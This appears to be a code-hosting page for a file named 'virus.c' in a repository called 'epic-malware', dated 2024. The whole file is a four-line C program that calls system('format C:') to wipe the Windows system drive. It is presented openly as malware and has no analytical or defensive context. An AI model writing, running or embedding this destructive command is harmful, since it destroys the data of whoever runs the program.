epic-malware/virus.c

4 lines
59 B
C
Raw Normal View History

2024-08-04 15:30:53 +02:00
#include <windows.h>
int main(){
system("format C:");
}